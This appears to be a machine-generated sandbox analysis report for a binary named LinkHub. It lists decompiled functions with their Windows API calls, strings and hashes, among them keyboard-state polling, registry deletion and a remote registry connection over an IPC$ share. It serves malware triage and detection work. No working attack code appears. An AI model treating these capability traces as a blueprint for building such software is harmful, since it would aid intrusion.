Opcode ID: f4877f0ebfb884c1268dabe9b0c6d565f9f3e7d1caf9c260e86abcef6150a36b
Instruction ID: d7f02c3e4073143696fbbeb564031e63eb67e18e2086a9652e63c59a074d5e0c
Opcode Fuzzy Hash: f4877f0ebfb884c1268dabe9b0c6d565f9f3e7d1caf9c260e86abcef6150a36b
Instruction Fuzzy Hash: 2F618D71A00249AFDF11CFA4D989AFEBFF9FB05348F144095E991A3291DB39AD01CB60

Function 00B6E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B6E4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B6E4FA
_wcslen.LIBCMT ref: 00B6E504
_wcsstr.LIBVCRUNTIME ref: 00B6E554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B6E570

Strings

04090000, xrefs: 00B6E5A6
\VarFileInfo\Translation, xrefs: 00B6E568
StringFileInfo\, xrefs: 00B6E543
%u.%u.%u.%u, xrefs: 00B6E64E
DefaultLangCodepage, xrefs: 00B6E5D3

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 381632352a2767f16c733b034a920b211c18644b49624448028f5bc86a8fbc9a
Instruction ID: 7bfc4a884fa4b944fe1cfa2cce998d55d6387604fe212602f6b8442ec8c769b4
Opcode Fuzzy Hash: 381632352a2767f16c733b034a920b211c18644b49624448028f5bc86a8fbc9a
Instruction Fuzzy Hash: C44115726442247BEB00AB65ED47EBF77ECDF51710F1000EAF909A6092EF78DA0197A5

Function 00B8D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B8D6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00B8D6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B8D7A8

Part of subcall function 00B8D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00B8D70A
Part of subcall function 00B8D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00B8D71D
Part of subcall function 00B8D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B8D72F
Part of subcall function 00B8D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B8D765
Part of subcall function 00B8D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B8D788

RegDeleteKeyW.ADVAPI32(?,?), ref: 00B8D753

Strings

advapi32.dll, xrefs: 00B8D718
RegDeleteKeyExW, xrefs: 00B8D729

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 7c5fffadad1cf864575acefd6a5da09c240ca8e305f4b707c7f64b6fb31df50f
Instruction ID: 968929f83a77383fb283bffa4729a66838a873b74bbf9cc648363c15ee852ed7
Opcode Fuzzy Hash: 7c5fffadad1cf864575acefd6a5da09c240ca8e305f4b707c7f64b6fb31df50f
Instruction Fuzzy Hash: CC316076901129BBD721AB51DD88EFFBBBCEF45710F0001A6F905E3160DA349E45DBA0

Function 00B6EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00B6EFCB

Part of subcall function 00B1F215: timeGetTime.WINMM(?,?,00B6EFEB), ref: 00B1F219

Sleep.KERNEL32(0000000A), ref: 00B6EFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00B6F01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B6F03E
SetActiveWindow.USER32 ref: 00B6F05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B6F06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00B6F08A
Sleep.KERNEL32(000000FA), ref: 00B6F095
IsWindow.USER32 ref: 00B6F0A1
EndDialog.USER32(00000000), ref: 00B6F0B2

Strings

BUTTON, xrefs: 00B6F030

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 86725770ba2b3191534c51a1eab7d1f924e979e152fbe9008db1469378ab4fcd
Instruction ID: 8945afde9c00f586d2b453a67865ae4209d6b7812cca86822c0ac69714c48399
Opcode Fuzzy Hash: 86725770ba2b3191534c51a1eab7d1f924e979e152fbe9008db1469378ab4fcd
Instruction Fuzzy Hash: 0321A175109206BFE7106F61FC99A26BBEAF758B84B000067F50593272EF7A8D408B62

Function 00B6F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B6F374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B6F38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B6F39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B6F3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B6F3BE

Strings

alias PlayMe, xrefs: 00B6F34D
status PlayMe mode, xrefs: 00B6F36F
close PlayMe, xrefs: 00B6F385, 00B6F3B2
play PlayMe, xrefs: 00B6F3B9
play PlayMe wait, xrefs: 00B6F3A8
open , xrefs: 00B6F323

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: b20ca6ab3ccd2163317e2f1cc940a51aff5e251fe6fe916f95d59edaf18233b8
Instruction ID: e752ec5e52b7927362f29284833dc8349c4d70ee8246eb6831b50f925b109978
Opcode Fuzzy Hash: b20ca6ab3ccd2163317e2f1cc940a51aff5e251fe6fe916f95d59edaf18233b8
Instruction Fuzzy Hash: 38119171A902597AD720A7669C4AFBF7EFCEB92B40F0004A97401E20E0DEA05904C9B0

Function 00B6A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B6A9D9
SetKeyboardState.USER32(?), ref: 00B6AA44
GetAsyncKeyState.USER32(000000A0), ref: 00B6AA64
GetKeyState.USER32(000000A0), ref: 00B6AA7B
GetAsyncKeyState.USER32(000000A1), ref: 00B6AAAA
GetKeyState.USER32(000000A1), ref: 00B6AABB
GetAsyncKeyState.USER32(00000011), ref: 00B6AAE7
GetKeyState.USER32(00000011), ref: 00B6AAF5
GetAsyncKeyState.USER32(00000012), ref: 00B6AB1E
GetKeyState.USER32(00000012), ref: 00B6AB2C
GetAsyncKeyState.USER32(0000005B), ref: 00B6AB55
GetKeyState.USER32(0000005B), ref: 00B6AB63

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 0a3d9c9837fcfd47ea9d5b7f115eeb130c5a047d532a07ef30055d8a23f18900
Instruction ID: f707eb2bfb4b23f6c83c9dc72d8ec6ce1a83a32d1d2dd2402ad75289bcb51953
Opcode Fuzzy Hash: 0a3d9c9837fcfd47ea9d5b7f115eeb130c5a047d532a07ef30055d8a23f18900
Instruction Fuzzy Hash: 5F51B460A0478429EF35D7A48950BEABFF5DF12340F0845DAC5C26B1C2DA689B8CCF63

Function 00B6662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00B66649
GetWindowRect.USER32(00000000,?), ref: 00B66662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00B666C0
GetDlgItem.USER32(?,00000002), ref: 00B666D0
GetWindowRect.USER32(00000000,?), ref: 00B666E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00B66736
GetDlgItem.USER32(?,000003E9), ref: 00B66744
GetWindowRect.USER32(00000000,?), ref: 00B66756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00B66798
GetDlgItem.USER32(?,000003EA), ref: 00B667AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B667C1
InvalidateRect.USER32(?,00000000,00000001), ref: 00B667CE

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: ae6115d380c597206fb9a2e7ddef499e2d42d75d326710016777a361728b6f69
Instruction ID: dd829d996c191a6cb0df32a8c64af81845d9926b28df5e2d16b3602ae42b7dd2
Opcode Fuzzy Hash: ae6115d380c597206fb9a2e7ddef499e2d42d75d326710016777a361728b6f69
Instruction Fuzzy Hash: 80512271B00205AFDF18CFA9DE85AAEBBB5FB48315F108169F919E7290DB749D04CB50

Function 00B0146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00B01802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B01488,?,00000000,?,?,?,?,00B0145A,00000000,?), ref: 00B01865

DestroyWindow.USER32(?), ref: 00B01521
KillTimer.USER32(00000000,?,?,?,?,00B0145A,00000000,?), ref: 00B015BB
DestroyAcceleratorTable.USER32(00000000), ref: 00B429B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00B0145A,00000000,?), ref: 00B429E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00B0145A,00000000,?), ref: 00B429F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B0145A,00000000), ref: 00B42A15
DeleteObject.GDI32(00000000), ref: 00B42A27

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: abded2256aa7af3a6051296f8f8854ddbaf7197bd7eb5f8419884358e8fd8fb8
Instruction ID: 47cac026a780ac4508859c1126b8d2d71a24bcd80aad082b8506f8166a1706aa
Opcode Fuzzy Hash: abded2256aa7af3a6051296f8f8854ddbaf7197bd7eb5f8419884358e8fd8fb8
Instruction Fuzzy Hash: B7617D31502701DFDB399F19DD69B29BBF1FB90312F5088AAE4424B6B0CB74A981EF45

Function 00B02128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00B02234: GetWindowLongW.USER32(?,000000EB), ref: 00B02242

GetSysColor.USER32(0000000F), ref: 00B02152

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 72936514f673dc535fa0450741c8e91865f3decbcf84a80c410d2cbec6da449c
Instruction ID: 2cba55a1d233d92e06847008e22ae09eeab28f5e0138fa2e0f83a45d7ec1dade
Opcode Fuzzy Hash: 72936514f673dc535fa0450741c8e91865f3decbcf84a80c410d2cbec6da449c
Instruction Fuzzy Hash: 5241D235100650AFDB215F39DC88BB93BE5EB52730F154296FAA6A72E1CB318D46DB10

Function 00B6A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00B50D31,00000001,0000138C,00000001,00000001,00000001,?,00B7EEAE,00BD2430), ref: 00B6A091
LoadStringW.USER32(00000000,?,00B50D31,00000001), ref: 00B6A09A

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00B50D31,00000001,0000138C,00000001,00000001,00000001,?,00B7EEAE,00BD2430,?), ref: 00B6A0BC
LoadStringW.USER32(00000000,?,00B50D31,00000001), ref: 00B6A0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B6A1E0

Strings

^ ERROR, xrefs: 00B6A175
%s (%d) : ==> %s: %s %s, xrefs: 00B6A1C4
Error: , xrefs: 00B6A197
Line %d:, xrefs: 00B6A11A
Line %d (File "%s"):, xrefs: 00B6A109

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: e7e84c3a3ad7d7d527ffc848ee4e4093fefbce0926ba1710aebc2b9dd7622d67
Instruction ID: 90fdf1083c1a08ae8534e9dc15c65cbf154fffbedcc6decd0dacd9945a1ee892
Opcode Fuzzy Hash: e7e84c3a3ad7d7d527ffc848ee4e4093fefbce0926ba1710aebc2b9dd7622d67
Instruction Fuzzy Hash: 7D413072840109AACF14EBE0DD96EEEBBB8AF15700F5041E5B501B2092EF756F49DF61

Function 00B60FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B08577: _wcslen.LIBCMT ref: 00B0858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B61093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B610AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B610CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B610F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00B6111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B61128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B6112D

Strings

\CLSID, xrefs: 00B61015
\IPC$, xrefs: 00B61075
SOFTWARE\Classes\, xrefs: 00B60FFF

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 19696485aa3152eccac1673e78dc888bb858eb71e3574cea390b312235ca7b5a
Instruction ID: efca2eb14252838db168056a65b6e4ed1db10be1bebc232b8ab5b026912fc4be
Opcode Fuzzy Hash: 19696485aa3152eccac1673e78dc888bb858eb71e3574cea390b312235ca7b5a
Instruction Fuzzy Hash: CC410A72C10129ABCF11EFA4DC95DEEBBB8FF18740F0485A9E901A31A1EB719E44CB50

Function 00B94A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B94AD9
CreateCompatibleDC.GDI32(00000000), ref: 00B94AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B94AF3
SelectObject.GDI32(00000000,00000000), ref: 00B94AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00B94B06
DeleteDC.GDI32(00000000), ref: 00B94B10
GetWindowLongW.USER32(?,000000EC), ref: 00B94B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00B94B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00B94B3C

Strings

static, xrefs: 00B94A71

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 5b3d23a2e054706ba20900b36689d85a3ab5ed89958849d5091a913247f1f068
Instruction ID: 790475e9d4d6c202adf921c111fdd456bc09d26cf6447efc6b31bc34858ee407
Opcode Fuzzy Hash: 5b3d23a2e054706ba20900b36689d85a3ab5ed89958849d5091a913247f1f068
Instruction Fuzzy Hash: E7317E32101215BBDF219FA5DD08FDA3BA9FF0D364F110261FA15A71A0CB75D851DB94

Function 00B8468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B846B9
CoInitialize.OLE32(00000000), ref: 00B846E7
CoUninitialize.OLE32 ref: 00B846F1
_wcslen.LIBCMT ref: 00B8478A
GetRunningObjectTable.OLE32(00000000,?), ref: 00B8480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00B84932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00B8496B
CoGetObject.OLE32(?,00000000,00BA0B64,?), ref: 00B8498A
SetErrorMode.KERNEL32(00000000), ref: 00B8499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B84A21
VariantClear.OLEAUT32(?), ref: 00B84A35

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: d801d06385626ff0501fdb6106a9b472d5ea1b1d9105a020449e6d6374cd4609
Instruction ID: 926ce67773640347bfb1d94f35df7d3e411867e43cb5b6b383016759536fd63b
Opcode Fuzzy Hash: d801d06385626ff0501fdb6106a9b472d5ea1b1d9105a020449e6d6374cd4609
Instruction Fuzzy Hash: AFC148716083029FD700EF68C98496BBBE9FF89748F10499DF9899B261DB31ED05CB52

Function 00B784DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B78538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B785D4
SHGetDesktopFolder.SHELL32(?), ref: 00B785E8
CoCreateInstance.OLE32(00BA0CD4,00000000,00000001,00BC7E8C,?), ref: 00B78634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B786B9
CoTaskMemFree.OLE32(?,?), ref: 00B78711
SHBrowseForFolderW.SHELL32(?), ref: 00B7879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B787BF
CoTaskMemFree.OLE32(00000000), ref: 00B787C6
CoTaskMemFree.OLE32(00000000), ref: 00B7881B
CoUninitialize.OLE32 ref: 00B78821

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: a2f2c6967348d490b2fee86e55c016092ffd37eb442cc8350ea7657b32a73361
Instruction ID: fd8510cad36994e9d0a6724e3dad8d883a9c80ded4c4e0142601774255cfccaf
Opcode Fuzzy Hash: a2f2c6967348d490b2fee86e55c016092ffd37eb442cc8350ea7657b32a73361
Instruction Fuzzy Hash: A1C10A75A00105AFDB14DFA5C888DAEBBF9FF48304B148599E41AEB361DB30EE45CB90

Function 00B60378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B6039F
SafeArrayAllocData.OLEAUT32(?), ref: 00B603F8
VariantInit.OLEAUT32(?), ref: 00B6040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00B6042A
VariantCopy.OLEAUT32(?,?), ref: 00B6047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00B60491
VariantClear.OLEAUT32(?), ref: 00B604A6
SafeArrayDestroyData.OLEAUT32(?), ref: 00B604B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B604BC
VariantClear.OLEAUT32(?), ref: 00B604CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B604D9

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
